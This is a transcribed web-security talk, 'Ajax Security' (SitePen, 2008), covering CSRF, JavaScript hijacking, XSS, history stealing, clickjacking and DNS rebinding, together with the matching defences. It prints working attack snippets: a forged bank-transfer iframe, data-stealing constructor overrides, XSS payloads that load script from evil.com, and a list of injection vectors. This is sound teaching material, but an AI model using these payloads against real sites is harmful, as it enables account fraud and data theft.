Ajax Security
              Keeping your application safe
                      Joe Walker




Copyright SitePen, Inc. 2008. All Rights Reserved
89 out of 10 Websites
             have serious vulnerabilities



Goal: Keep the bad guys out of your website



The Attackers




       Who is the attacker?
        • Troublemakers / Thieves
       Who is the victim?
        • Your data / Your users / Your partners



Agenda

                                                    CSRF, Login CSRF
                                                    JavaScript Hijacking
                                                    XSS
                                                    History Stealing
                                                    Combination Attacks
                                                    Session Fixation + ADP +
                                                    Clickjacking



CSRF
(Cross Site Request Forgery)

You can still abuse someone else’s cookies
and headers even if you can’t read them
Recap: Cross-Domain Rules


       On www.bank.com:
         c = document.cookie;
         alert(c);
         /* Shows cookies from www.bank.com */

       On www.evil.com:
         c = document.cookie;
         alert(c);
         /* Shows cookies from www.evil.com */




Abusing a Cookie without reading it

       www.bank.com:
         Welcome to Bank.com
         We offer the best rates anywhere in the world, guaranteed. Give us your
         money and we will look after it in the same way we look after little
         baby kittens.

       www.evil.com:
         Welcome to Evil.com
         We’ve got lots of warez to give away for freee. Download our stuffs and
         then come back and get more stuffs. Videoz, Warez, Codez, Mp3s.

         (hidden in the evil.com page:)
         <iframe width=0 height=0
           src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>

CSRF

       JavaScript is not always required to exploit a CSRF hole

       Often all you need is:
              • <iframe src="dangerous_url">
              • or <img src="dangerous_url"/>
              • or <script src="dangerous_url">


       You can’t use XHR because cross-domain rules prevent
       the request from being sent


CSRF

       CSRF attacks are write-only (with one exception)

       Both GET and POST can be forged

       Referrer checking is not a complete fix

       It’s not just cookies that get stolen:
          • HTTP-Auth headers
          • Active Directory Kerberos tokens


CSRF - Protection

       Force users to log off (not a 100% solution)

       Check referrer headers (https only) (not a 100% solution)

       Include authentication tokens in the body of EVERY request
       (the only complete solution)



CSRF - Protection

       Security tokens in GET requests are not a great idea
          (bookmarks, caches, GET is idempotent etc)

       POST means forms with hidden fields
        • OWASP servlet filter
          http://www.owasp.org/index.php/CSRF_Guard

       Double-submit cookie pattern (Ajax requests only)
        • Read the cookie with Javascript and submit in the
          body

Login CSRF
(Tricking someone into thinking they are you)



CSRF turned inside out
Login CSRF



       If I can make your browser do things behind your back,
       how about logging you out of some service and back in
       as me.

       What are the possibilities when you think that you are
       you, but you’re not; you’re me?




Login CSRF - Attacks



       What can I do?
        • See what you search for
        • See what books you want to buy
        • Read emails that you send
        • Steal credit card details through PayPal
        • etc




Login CSRF - Defense



       If submitting over https: use Referrer checking
          • Do not assume no referrer is safe

       Use authentication tokens in your login form
       Watch out for session fixation attacks
        • Invalidate the server session on login and re-create it




JavaScript
    Hijacking
  (or how your GMail
 contacts were at risk)



Sucking data out of Objects before
they’re created
JavaScript Hijacking



       “CSRF is write-only with one known exception”

       Using <script> automatically evaluates the returned
       script

       So if you can just find a way to intercept scripts as they
       are evaluated ...



<script type="text/javascript">
  // Redefine the global Object constructor. In browsers of the time the
  // object literal below invoked it, so the alert fires when {} is created.
  function Object() {
    alert("Hello, World");
  }
  var x = {};
</script>




<script type="text/javascript">
  // Same trick, but the constructor installs a setter on every new object,
  // so assigning a property hands its value to the setter.
  function Object() {
    this.__defineSetter__('wibble', function(x) {
      alert(x);
    });
  }

  var x = {};
  x.wibble = "Hello, World";
</script>




<script type="text/javascript">
  // Keep a reference to each object as it is constructed, then dump its
  // properties once the included script has filled it in.
  var obj;
  function Object() {
    obj = this;
    this.__defineSetter__('killme', function(x) {
      for (var key in obj) {
        if (key != 'killme') {
          alert('Stolen: ' + key + '=' + obj[key]);
        }
      }
    });
    // Fire the setter on the next tick, after the object literal is complete.
    setTimeout("obj['killme']='ignored';", 0);
  }
</script>
<!-- The data service's reply is evaluated as script with the Object above in scope -->
<script src="http://example.com/data-service/"></script>


JavaScript Hijacking



       When you serve JavaScript from a website it could be evaluated
       in a hostile environment

       Protect secrets in JavaScript in the same way that you would
       protect them elsewhere




JavaScript Hijacking



       Sometimes people wish to have a double layer of
       security to prevent evaluation:
         /*<JSON_HERE>*/                    (Don’t do this)
         while(true); <JSON_HERE>           (Google)
         throw new Error(""); <JSON_HERE>   (DWR)
         {}&& <JSON_HERE>
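As an added example (not from the slides), the `while(true);` prefix from the list above as a server-side wrapper with the matching client-side unwrapper, plus a check for the input that makes the comment wrapper unsafe; the data values are constructed:

```javascript
// Added example, not from the slides. A reply that starts with "while(true);"
// hangs if it is pulled in through <script src=...>, so the Object-constructor
// trick above never sees the data. The page's own XHR code, which can read
// the response text, strips the prefix before parsing.
const GUARD = 'while(true);';

// Server side: prefix every JSON reply meant for Ajax clients.
function wrapJson(value) {
  return GUARD + JSON.stringify(value);
}

// Client side: refuse anything without the guard, so a response that did not
// come through the protected path is never parsed by mistake.
function unwrapJson(text) {
  if (!text.startsWith(GUARD)) {
    throw new Error('missing anti-hijacking prefix');
  }
  return JSON.parse(text.slice(GUARD.length));
}

// Why the "/*<JSON>*/" form is the one to avoid (my explanation, not the
// slide's): if user-controlled data inside the JSON contains "*/", the comment
// closes early and the rest of the reply is evaluated as script. JSON.stringify
// does not escape "/" so the sequence survives serialisation.
function commentGuardBreaks(value) {
  return JSON.stringify(value).includes('*/');
}

// Walk-through with a constructed contacts list.
function demo() {
  const reply = { contacts: [{ name: 'Joe', email: 'joe@example.com' }] };
  const wire = wrapJson(reply);
  return {
    prefixed: wire.startsWith(GUARD),
    roundTrip: unwrapJson(wire).contacts[0].email,
    plainIsSafeToComment: !commentGuardBreaks({ note: 'hello' }),
    hostileBreaksComment: commentGuardBreaks({ note: 'x */ alert(1); /*' }),
  };
}
```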




XSS (Cross Site Scripting)

Abusing someone’s trust in your typing
XSS



       2 types:
         • Reflected: Script embedded in the request is
           ‘reflected’ in the response
         • Stored: Attacker’s input is stored and played back in
           later page views




XSS

       Scenario: You let the user enter their name

       Someone is going to enter their name like this:
                    Joe<script src="http://evil.com/danger.js">


       Then, whoever looks at Joe’s name will execute Joe’s
       script and become a slave of Joe

       Generally HTML is not a valid input, but sometimes it is:
        • Blogs, MySpace, Wikis, RSS readers, etc

XSS - Making User Input Safe




       So, you filter out ‘<script.*>’ and then you’re safe.
       Right?




XSS - Places that scripts get eval()ed
       1. <table background="javascript:danger()">
       2. <input type='image' src='javascript:danger()'/>
       3. <object type="text/x-scriptlet" data="evil.com/danger.js">
       4. <img src='javascript:danger()'/>
       5. <frameset><frame src="javascript:danger()">
       6. <link rel="stylesheet" href="javascript:danger()"/>
       7. <base href="javascript:danger()">
       8. <meta http-equiv="refresh" content="0;url=javascript:danger()">
       9. <p style='background-image: url("javascript:danger()")');
       10.<a href='javascript:danger()'>
       11.<tr background="javascript:danger()">
       12.<body onload='danger()'>
       13.<div onmouseover='danger()'>
       14.<body background="javascript:danger()">
       15.<div onscroll='danger()'>
       16.<div onmouseenter='danger()'>
       17.<style>@import evil.com/danger.js</style>
       18.<style>BODY{-moz-binding:url("http://evil.com/danger.js#xss")}</style>
       19.<xss style="behavior:url(danger.htc);">
       20.<div style="background-image: url(javascript:danger())">
       21.<div style="width: expression(danger());">
       22.<xss style="xss:expression(danger())">

       Many more: http://ha.ckers.org/xss.html




XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href="a.html" link</a>


       makes perfect sense to a browser.




XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href="a.html">link


       makes perfect sense to a browser.




XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This:
       <a href="a.html >link</a>


       makes perfect sense to a browser.




XSS - Making User Input Safe



       It’s made 1000 times worse by browsers being able to
       make sense of virtually anything.
       This: (depending on some encoding tricks)
       ¼a href=quot;a.htmlquot;¾link¼/a¾


       makes perfect sense to a browser.




XSS - Making User Input Safe


       And we haven’t got into:
         • Flash (ActionScript ~= JavaScript)
         • SVG (can embed JavaScript)
         • XML Data Islands (IE only)
         • HTML+TIME
       You can use both <object> and <embed> for many of
       these



XSS - The Heart of the Problem




                                “Be conservative in what you do; be
                                liberal in what you accept from others”
                                                             Postel’s Law




XSS - The Heart of the Problem



                   [Diagram: In, combined (+) with A and B, gives Out]



The web developers get lazy ...
The browser fixes the problems ...




The users like the new browser ...




The web developers get even lazier ...




The browser fixes the problems ...




The users like the new browser even more ...




XSS - The Heart of the Problem



                  ¼STYLE¾@import'javas
                  cri

                  pt:danger()';¼/STYLE¾




XSS - Protection (HTML is Illegal)

       1. Filter inputs by white-listing input characters
         • Remember to filter header names and values

       2. Filter outputs for the destination environment
          For HTML:
            <  →  &lt;    >  →  &gt;    '  →  &apos;    "  →  &quot;    &  →  &amp;
          For JavaScript strings (but see later):
            '  →  \'    "  →  \"    LF  →  \n    CR  →  \r    *  →  \uXXXX

          Other environments have other special chars


XSS - Protection (well-formed HTML is legal)

                  1. Filter inputs as before
                  2. Validate as HTML and throw away if it fails
                  3. Swap characters for entities (as before)
                  4. Swap back whitelist of allowed tags. e.g.:
                         • &lt;strong&gt;  →  <strong>

                  5. Take extra care over attributes:
                         • &lt;a href=&quot;([^&]*)&quot;/&gt;  →  <a href="$1"/>

                  6. Take great care over regular expressions
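As an added example (not from the slides), the escaping table from the previous slide together with swap-back steps 3 to 5 above, in JavaScript; the whitelist (strong, em, a) and the http/https-only href check are assumptions beyond what the slides state:

```javascript
// Added example, not from the slides: escape for the output context first,
// then allow a small whitelist of tags back. The href check is the "extra
// care over attributes" step: without it a javascript: URL would survive the
// swap-back unchanged, which is item 10 in the eval() list above.

// HTML context (step 3): every special character becomes an entity.
// "&" goes first so already-produced entities are not escaped twice.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

// JavaScript string context: quotes and line breaks get their escapes and
// everything else non-alphanumeric becomes \uXXXX, so the value can neither
// close the string nor the surrounding <script> element.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (ch) => {
    switch (ch) {
      case "'": return "\\'";
      case '"': return '\\"';
      case '\n': return '\\n';
      case '\r': return '\\r';
      default: return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
    }
  });
}

// Step 4: tags that carry no attributes are safe to swap back verbatim.
const SIMPLE_TAGS = ['strong', 'em'];

// Step 5: an href is only allowed back if it is an http(s) URL. Because "&"
// was escaped, [^&]* also rejects any URL containing an entity, as the
// slide's own pattern does.
function isSafeHref(href) {
  return /^https?:\/\//i.test(href);
}

function allowWhitelist(escaped) {
  let out = escaped;
  for (const tag of SIMPLE_TAGS) {
    out = out.split(`&lt;${tag}&gt;`).join(`<${tag}>`)
             .split(`&lt;/${tag}&gt;`).join(`</${tag}>`);
  }
  out = out.replace(/&lt;a href=&quot;([^&]*)&quot;&gt;/g, (match, href) =>
    isSafeHref(href) ? `<a href="${href}">` : match);
  out = out.split('&lt;/a&gt;').join('</a>');
  return out;
}

// Rendering a user-supplied name into plain content: escape only.
function renderName(name) {
  return `<div>${escapeHtml(name)}</div>`;
}
```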


XSS - Protection (malformed HTML is legal)



                  1. Find another way to do it / Swap jobs / Find
                  some other solution to the problem
                  2. Create a tag soup parser to create a DOM tree
                  from a badly formed HTML document
                    • Remember to recursively check encodings
                  3. Create a tree walker that removes all non
                  approved elements and attributes


There is NO WAY to protect
            against some injection points



XSS - Injection Points

       Places you can protect:
         • Plain content
           <div>$</div>
         • Some attribute values
           <input name=x value="$"> (but take care)
         • Javascript string values:
           <script>str = "$";</script> (but take care)

       Anything else is likely to be unsafe


XSS - Injection Points

       Places you can’t easily protect:
          • <script>$</script>
          • <div $>
          • <div style="$">...
          • <div background="$">
          • <img src="$">
          • etc
       If users can affect CSS values, hrefs, srcs or plain
       JavaScript then you are likely to have an XSS hole


XSS Tricks:
                                    Comment Power-up



XSS - Comment Power-up



       Commonly reflected attacks have length restrictions

       How to create space for an injection attack
        • Use ‘<script>/*’ in a restricted, unprotected field
          and ‘*/’ in a later unrestricted, protected field




XSS - Summary

       For data input:
              • Restrict allowed characters for the destination type

       For data output:
              • Escape for the destination environment
              • Ensure the encoding is specified (e.g. UTF-8)

       Allow injection only into known safe points

       Never assume that a hole is too small to jump through


History Stealing



I know where you’ve been, parts 1, 2, 3
History Stealing - Part 1


       Mr. Evil wants to know if you visit bank.com

       He creates a page with a link and
       uses a script to read the CSS link
       color:
         • purple: customer
         • blue: not a customer



History Stealing - Part 2




       2 methods of detecting link color:
         • Easy - use JavaScript to read CSS properties
         • When JS is turned off - use CSS to ping the server




History Stealing - Part 2



       Point a script tag at a protected HTML resource, detect
       differing replies by differing error messages
       <script src="http://mail.google.com/mail">


       http://ha.ckers.org/weird/javascript-website-login-checker.html




History Stealing - Part 3

       A page can quickly check thousands of sites and find
       where you bank and store your email

       A page can follow your clicks around the net:
         • Check for common set of URLs
         • Page reports hits to server
         • Server reads hit pages, greps out links sends links
           back
         • Page checks and follows a click-stream


Combination Attacks
Small holes don’t add up, they
multiply up
Web Worms

       If your site isn’t 100% safe against XSS and CSRF, users
       can attack their ‘friends’ with scripts




       XHR/Flash/Quicktime can be used as a vector
       Web worms grow much faster than email worms
       So far, infections have been mostly benign, like how email
       worms were in the early 90’s ...
       http://www.whitehatsec.com/downloads/WHXSSThreats.pdf


Intranet Hacking



       History stealing to enumerate hosts inside the firewall
       Anti-DNS pinning to read HTML from inside
       Many routers / firewalls / etc have default passwords,
       which an attacker can exploit
       Use CSRF to alter router / firewall settings
       http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf




Clickjacking



When the page you are looking at is not
the page you think you are looking at
Clickjacking - Protection




                  // Frame-busting check: if this page is not the top-level
                  // window it has been framed, so hide the body. Script-only
                  // checks like this can be defeated; pair them with the
                  // X-Frame-Options response header.
                  if (window.top != window) {
                    document.body.style.display = "none";
                  }




ADP = Anti DNS Pinning



Moving intranet servers into your
domain
Anti-DNS Pinning

       [Sequence of diagram slides. Each shows the browser, the DNS server for
       evil.com, the attacker’s web server at 1.2.3.4 and an intranet host at
       10.0.0.1.]

       1. User: “Let’s visit evil.com”
       2. Browser asks DNS: “What’s the IP address for evil.com?”
       3. DNS: “You need 1.2.3.4 (timeout = 1 sec)”
       4. Browser to 1.2.3.4: “Can I have http://evil.com?”
       5. 1.2.3.4 returns HTML + JavaScript that creates an iframe 2 seconds
          after the page has loaded
       6. Time passes (2 seconds)
       7. Browser asks DNS again: “What’s the IP address for evil.com?”
       8. DNS: “You need 10.0.0.1”
       9. Browser to 10.0.0.1: “Can I have http://evil.com/blah?”
       10. This web server is really http://intranet.corp.com
       11. Outer frame reads text from inner iframe and sends it back to 1.2.3.4

Anti-DNS Pinning


       About ‘Pinning’:
       Browsers ‘pin’ addresses to stop short timeouts
       DNS round-robin forces re-query of DNS if
       website appears to be down
       So websites can get around pins by firewalling
       themselves thus appearing to be down


Anti-DNS Pinning

       It’s not great for the Internet:

       The browser thinks the domain is evil.com, so cookies
       for innocent.com are not sent:
          Cookie protected resources are safe (for now)

       But it’s great for Intranet hacking
         No cookies needed to read from
         192.168.0.1 or 127.0.0.1


Questions?

                                        Joe Walker
                   http://sitepen.com
        http://directwebremoting.org/blog/joe

Web 2.0 Hacking



Everything has a down side
Web 2.0 Hacking

       Building blocks:
        • Google Alerts: Search to EMail
        • Mailinator: EMail to RSS
        • Ponyfish: Web to RSS via scraping
        • Storage: DabbleDB, Zoho
        • Yahoo Pipes: RSS remixing
        • L8R: Cron for EMail
        • Google Mashup Editor: RSS to REST API
        • Dapper, OpenKappow


More Information



Dropping SSL after login is dangerous


       Being able to snoop on someone else’s cookie is
       virtually the same as being able to snoop on their
       password
       Some services (e.g. Google) default to http after login
       (bad), but allow you to use https for the whole session:
          • https://mail.google.com/mail/
          • https://www.google.com/calendar/
          • etc.



Useful Tools

       Firefox:
          • NoScript - Accept scripts only from sites you trust
          • AltCookies - Accept cookies only from sites you trust
          • EditCookies - Alter cookies for testing
          • Firebug - Dig deeply into HTTP/JavaScript/CSS
       General:
          • Paros - Filtering Proxy (can be configured to be
            transparent)
          • Burp - Like Paros
          • Fiddler - Like Paros with integration into IE



Kiezen van een open source content management systeem drie uitgangspunten e...Geert Wissink
 
ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」Hikaru GOTO
 
Las Tendas-Madrid
Las Tendas-MadridLas Tendas-Madrid
Las Tendas-Madridguest149d7a
 
Breidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityBreidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityAlan Doherty
 
Psicologia
PsicologiaPsicologia
Psicologiacaro13
 
Training And Development Why Bother
Training And  Development   Why BotherTraining And  Development   Why Bother
Training And Development Why Bothernjweiss
 
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayBlue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayAmazon Web Services
 
Image & Graphic Files
Image & Graphic FilesImage & Graphic Files
Image & Graphic Filesbs07d3p
 

Viewers also liked (20)

Hacking for Fun and Profit
Hacking for Fun and ProfitHacking for Fun and Profit
Hacking for Fun and Profit
 
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn Cường
 
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android ApplicationsSteelcon 2015 Reverse-Engineering Obfuscated Android Applications
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
 
Reverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android appsReverse engineering and instrumentation of android apps
Reverse engineering and instrumentation of android apps
 
Understanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineUnderstanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual Machine
 
Normativa Firma Digitale
Normativa Firma DigitaleNormativa Firma Digitale
Normativa Firma Digitale
 
Kiezen van een open source content management systeem drie uitgangspunten e...
Kiezen van een open source content management systeem   drie uitgangspunten e...Kiezen van een open source content management systeem   drie uitgangspunten e...
Kiezen van een open source content management systeem drie uitgangspunten e...
 
Kyoto Gardens
Kyoto GardensKyoto Gardens
Kyoto Gardens
 
ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」ケーズホールディングス 経営の特徴「がんばらない経営」
ケーズホールディングス 経営の特徴「がんばらない経営」
 
Juliols
JuliolsJuliols
Juliols
 
25
2525
25
 
หมวก6ใบ
หมวก6ใบหมวก6ใบ
หมวก6ใบ
 
Las Tendas-Madrid
Las Tendas-MadridLas Tendas-Madrid
Las Tendas-Madrid
 
Final Learning Process
Final Learning ProcessFinal Learning Process
Final Learning Process
 
Breidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow UniversityBreidamerkurjokull Maps from Glasgow University
Breidamerkurjokull Maps from Glasgow University
 
Psicologia
PsicologiaPsicologia
Psicologia
 
Training And Development Why Bother
Training And  Development   Why BotherTraining And  Development   Why Bother
Training And Development Why Bother
 
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo DayBlue Raster Presentation for Earth Observation in the Cloud Demo Day
Blue Raster Presentation for Earth Observation in the Cloud Demo Day
 
Image & Graphic Files
Image & Graphic FilesImage & Graphic Files
Image & Graphic Files
 

Similar to Ajax Security

Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAsjohnwilander
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)johnwilander
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 

Similar to Ajax Security (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 

Recently uploaded

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataSafe Software
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?SANGHEE SHIN
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIUdaiappa Ramachandran
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 

Recently uploaded (20)

Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial DataCloud Revolution: Exploring the New Wave of Serverless Spatial Data
Cloud Revolution: Exploring the New Wave of Serverless Spatial Data
 
